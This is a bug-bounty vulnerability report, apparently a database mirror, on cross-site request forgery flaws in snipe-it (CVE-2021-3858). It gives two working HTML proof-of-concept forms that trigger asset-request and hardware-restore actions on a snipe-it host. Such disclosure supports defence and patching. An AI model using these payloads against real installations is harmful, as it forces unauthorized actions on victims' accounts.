Lucene search
AmammadA2FAC2EB-100D-45B1-9AC7-71847C2F2B6BHistoryOct 04, 2021 - 9:33 p.m.
Cross-Site Request Forgery (CSRF) in snipe/snipe-it
2021-10-0421:33:44
amammad
www.huntr.dev
7
cross-site request forgery
snipe-it
csrf
vulnerability
proof of concept
bug bounty
EPSS
0.001
Percentile
47.3%
Description
I found some low/medium level CSRFs on nice snipe-it application
Proof of Concepts
change the state of Requestable Assets :
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://develop.snipeitapp.com/account/request-asset/{id}">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
restore a hardware :
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://develop.snipeitapp.com/hardware/{id}/restore">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Related
osv
osv
Cross-Site Request Forgery in snipe-it
2021-10-21 17:48:55
CVE-2021-3858
2021-10-19 13:15:11
prion
prion
Cross site request forgery (csrf)
2021-10-19 13:15:00
cvelist
cvelist
CVE-2021-3858 Cross-Site Request Forgery (CSRF) in snipe/snipe-it
2021-10-19 12:30:29
cnvd
cnvd
Snipe-IT Cross-site Request Forgery Vulnerability (CNVD-2022-19843)
2021-10-22 00:00:00
github
github
Cross-Site Request Forgery in snipe-it
2021-10-21 17:48:55
nvd
nvd
CVE-2021-3858
2021-10-19 13:15:11
cve
cve
CVE-2021-3858
2021-10-19 13:15:11